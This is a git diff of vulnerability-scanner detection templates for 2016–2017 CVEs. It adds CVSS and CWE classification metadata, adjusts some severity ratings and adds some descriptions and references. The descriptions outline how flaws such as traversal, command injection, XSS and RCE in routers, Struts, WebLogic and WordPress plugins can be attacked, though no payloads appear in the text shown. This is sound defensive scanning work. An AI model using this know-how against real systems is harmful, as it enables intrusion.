b/cves/2016/CVE-2016-2389.yaml @@ -9,6 +9,11 @@ info: - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - https://www.cvedetails.com/cve/CVE-2016-2389 tags: cve,cve2016,lfi,sap + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-2389 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index 26b9577ef4..86662795dc 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -10,6 +10,11 @@ info: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://struts.apache.org/docs/s2-032.html tags: cve,cve2016,struts,rce,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2016-3081 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml index 2238126a04..40868caf7e 100644 --- a/cves/2016/CVE-2016-5649.yaml +++ b/cves/2016/CVE-2016-5649.yaml @@ -7,6 +7,11 @@ info: description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. tags: cve,cve2016,iot,netgear,router reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-5649 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index 964fdfed40..fddddf2586 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -3,12 +3,17 @@ id: CVE-2016-6277 info: name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE author: pikpikcu - severity: critical + severity: high description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. tags: cve,cves2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-6277 + cwe-id: CWE-352 requests: - method: GET diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml index 686d2c2635..0e56752878 100644 --- a/cves/2016/CVE-2016-7552.yaml +++ b/cves/2016/CVE-2016-7552.yaml @@ -7,6 +7,11 @@ info: description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 tags: cve,cve2016,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-7552 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml index 9f543433f5..a15b21c00b 100644 --- a/cves/2016/CVE-2016-7981.yaml +++ b/cves/2016/CVE-2016-7981.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981 tags: cve,cve2016,xss,spip + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-7981 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index 7dc6d15282..c1eb936feb 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml @@ -7,6 +7,11 @@ info: description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. reference: https://www.exploit-db.com/exploits/45196 tags: cve,cve2017,oracle,glassfish,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-1000028 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index cb3e001dd0..ef6415afce 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -7,6 +7,11 @@ info: reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal tags: cve,cve2017,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-1000170 + cwe-id: CWE-22 requests: - method: POST diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index 16dc0d9801..d7a07c5e57 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml @@ -11,6 +11,11 @@ info: - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 tags: cve,cve2017,primetek,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-1000486 + cwe-id: CWE-326 requests: - raw: diff --git a/cves/2017/CVE-2017-10075.yaml b/cves/2017/CVE-2017-10075.yaml index 34dde57e91..d7eb8e1003 100644 --- a/cves/2017/CVE-2017-10075.yaml +++ b/cves/2017/CVE-2017-10075.yaml @@ -3,10 +3,14 @@ id: CVE-2017-10075 info: name: Oracle Content Server XSS author: madrobot - severity: medium + severity: high description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site. reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html tags: cve,cve2017,xss,oracle + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.20 + cve-id: CVE-2017-10075 requests: - method: GET diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 26de578c10..1e9b5d37af 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -9,6 +9,10 @@ info: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc tags: cve,cve2017,rce,oracle,weblogic + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2017-10271 requests: - raw: diff --git a/cves/2017/CVE-2017-11444.yaml b/cves/2017/CVE-2017-11444.yaml index 0af1f0dba3..324b2e11ac 100644 --- a/cves/2017/CVE-2017-11444.yaml +++ b/cves/2017/CVE-2017-11444.yaml @@ -3,12 +3,17 @@ id: CVE-2017-11444 info: name: Subrion CMS SQL Injection author: dwisiswant0 - severity: high + severity: critical description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array. reference: - https://github.com/intelliants/subrion/issues/479 - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q tags: cve,cve2017,sqli,subrion + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-11444 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml index fd2fd2781a..8ead0e5c2a 100755 --- a/cves/2017/CVE-2017-12149.yaml +++ b/cves/2017/CVE-2017-12149.yaml @@ -10,6 +10,11 @@ info: - https://chowdera.com/2020/12/20201229190934023w.html - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 tags: cve,cve2017,java,rce,deserialization + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12149 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml index da7a45c350..e6b40b0d91 100644 --- a/cves/2017/CVE-2017-12542.yaml +++ b/cves/2017/CVE-2017-12542.yaml @@ -9,6 +9,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://www.exploit-db.com/exploits/44005 tags: cve,cve2017,ilo4,hpe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-12542 requests: - method: GET diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index ae2639eebb..d4f8d1050e 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -7,6 +7,11 @@ info: description: In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack. reference: https://struts.apache.org/docs/s2-053.html tags: cve,cve2017,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12611 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml index e78786d62d..2c16f2c1fe 100644 --- a/cves/2017/CVE-2017-12615.yaml +++ b/cves/2017/CVE-2017-12615.yaml @@ -3,7 +3,7 @@ id: CVE-2017-12615 info: name: Apache Tomcat RCE author: pikpikcu - severity: critical + severity: high tags: cve,cve2017,apache,rce reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 description: | @@ -11,6 +11,11 @@ info: This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-12615 + cwe-id: CWE-434 requests: - method: PUT diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index f9f543a9b9..653122ae26 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml @@ -10,6 +10,12 @@ info: - https://twitter.com/honoki/status/1298636315613974532 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12629 + cwe-id: CWE-611 + description: "Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr." requests: - raw: diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml index 5565f23393..7e7edb5586 100644 --- a/cves/2017/CVE-2017-12635.yaml +++ b/cves/2017/CVE-2017-12635.yaml @@ -3,10 +3,15 @@ id: CVE-2017-12635 info: name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 Remote Privilege Escalation author: pikpikcu - severity: high + severity: critical description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. reference: https://github.com/assalielmehdi/CVE-2017-12635 tags: cve,cve2017,couchdb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12635 + cwe-id: CWE-269 requests: - raw: diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml index 46cbdb8d04..905e10391a 100644 --- a/cves/2017/CVE-2017-12637.yaml +++ b/cves/2017/CVE-2017-12637.yaml @@ -10,6 +10,11 @@ info: - https://www.cvedetails.com/cve/CVE-2017-12637/ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-12637 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml index 56d43089ee..ad1ea847cc 100644 --- a/cves/2017/CVE-2017-12794.yaml +++ b/cves/2017/CVE-2017-12794.yaml @@ -10,6 +10,11 @@ info: description: | In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. tags: xss,django,cve,cve2017 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-12794 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index 6a91a097cf..a9b3be6385 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml @@ -8,6 +8,12 @@ info: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 tags: cve,cve2017,trixbox,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-14535 + cwe-id: CWE-78 + description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." requests: - raw: diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 9772411357..03689a2002 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - https://sourceforge.net/projects/asteriskathome/ # vendor homepage + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2017-14537 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml index 763aeee7c4..91fc63e9f3 100644 --- a/cves/2017/CVE-2017-14651.yaml +++ b/cves/2017/CVE-2017-14651.yaml @@ -6,6 +6,15 @@ info: severity: medium description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. tags: cve,cve2017,wso2,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.80 + cve-id: CVE-2017-14651 + cwe-id: CWE-79 + reference: + - https://github.com/cybersecurityworks/Disclosed/issues/15 + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265 + - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html requests: - method: GET diff --git a/cves/2017/CVE-2017-14849.yaml b/cves/2017/CVE-2017-14849.yaml index 184da5d96f..6a386ab381 100644 --- a/cves/2017/CVE-2017-14849.yaml +++ b/cves/2017/CVE-2017-14849.yaml @@ -6,6 +6,15 @@ info: severity: high description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules. tags: cve,cve2017,nodejs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-14849 + cwe-id: CWE-22 + reference: + - https://twitter.com/nodejs/status/913131152868876288 + - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ + - http://www.securityfocus.com/bid/101056 requests: - method: GET diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml index 5102cbacf4..57a6eda186 100644 --- a/cves/2017/CVE-2017-15647.yaml +++ b/cves/2017/CVE-2017-15647.yaml @@ -3,12 +3,17 @@ id: CVE-2017-15647 info: name: FiberHome - Directory Traversal author: daffainfo - severity: medium + severity: high description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. reference: - https://www.exploit-db.com/exploits/44054 - https://www.cvedetails.com/cve/CVE-2017-15647 tags: cve,cve2017,lfi,router + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-15647 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 2de5b8d83a..2a2853e552 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 severity: high tags: cve,cve2017,apache,httpd,fileupload + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-15715 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index f68fcd4a77..41f4f5c82f 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -7,8 +7,12 @@ info: reference: - https://www.exploit-db.com/exploits/43342 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - severity: high + severity: critical tags: cve,cve2017,rce,vpn,paloalto,globalprotect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-15944 requests: - raw: diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml index ef7744125e..e4057dae37 100644 --- a/cves/2017/CVE-2017-16806.yaml +++ b/cves/2017/CVE-2017-16806.yaml @@ -6,6 +6,12 @@ info: reference: https://www.exploit-db.com/exploits/43141 severity: high tags: cve,cve2017,ulterius,traversal + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-16806 + cwe-id: CWE-22 + description: "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal." requests: - method: GET diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml index 6af9898153..ed8c14a5be 100644 --- a/cves/2017/CVE-2017-16877.yaml +++ b/cves/2017/CVE-2017-16877.yaml @@ -7,6 +7,11 @@ info: description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information. reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 tags: cve,cve2017,nextjs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-16877 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml index 8dab040905..9eb08d7a3a 100644 --- a/cves/2017/CVE-2017-17043.yaml +++ b/cves/2017/CVE-2017-17043.yaml @@ -7,6 +7,11 @@ info: description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17043 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index 10ad0d299d..5fcc0923df 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml @@ -9,6 +9,11 @@ info: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17059 + cwe-id: CWE-79 requests: - method: POST diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml index 9a2c3bce2f..2cd0371034 100644 --- a/cves/2017/CVE-2017-17451.yaml +++ b/cves/2017/CVE-2017-17451.yaml @@ -7,6 +7,11 @@ info: description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17451 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index ab048ea172..0f87ecde9f 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -10,6 +10,11 @@ info: - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562 severity: high tags: cve,cve2017,rce,embedthis,goahead,fuzz + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-17562 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml index 9388b6bf6c..89de79241d 100644 --- a/cves/2017/CVE-2017-18024.yaml +++ b/cves/2017/CVE-2017-18024.yaml @@ -11,6 +11,11 @@ info: description: | AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. tags: cve,cve2017,xss,avantfax + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-18024 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml index 7bed4c11c3..4f60e9dca3 100644 --- a/cves/2017/CVE-2017-18536.yaml +++ b/cves/2017/CVE-2017-18536.yaml @@ -7,6 +7,11 @@ info: description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-18536 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index fc7f16e8cc..8c240d1426 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -11,6 +11,11 @@ info: - https://github.com/advisories/GHSA-vfj6-275q-4pvm - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 tags: cve,cve2017,graphite,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-18638 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 5ccba81a04..0e0bff68e3 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -9,6 +9,10 @@ info: reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 7.40 + cve-id: CVE-2017-3506 requests: - raw: diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml index 2003bf9c99..b172154381 100644 --- a/cves/2017/CVE-2017-3528.yaml +++ b/cves/2017/CVE-2017-3528.yaml @@ -3,11 +3,17 @@ id: CVE-2017-3528 info: name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect author: 0x_Akoko - severity: low + severity: medium reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 tags: oracle,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2017-3528 + cwe-id: CWE-601 + description: "Vulnerability in the Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.0 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N)." requests: - method: GET diff --git a/cves/2017/CVE-2017-3881.yaml b/cves/2017/CVE-2017-3881.yaml index 3e200f2bf4..e852d525d0 100644 --- a/cves/2017/CVE-2017-3881.yaml +++ b/cves/2017/CVE-2017-3881.yaml @@ -10,6 +10,11 @@ info: - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent. tags: cve,cve2017,cisco,rce,network + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-3881 + cwe-id: CWE-20 network: - inputs: diff --git a/cves/2017/CVE-2017-4011.yaml b/cves/2017/CVE-2017-4011.yaml index 23b1ffb9b3..835026085e 100644 --- a/cves/2017/CVE-2017-4011.yaml +++ b/cves/2017/CVE-2017-4011.yaml @@ -10,6 +10,11 @@ info: - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - 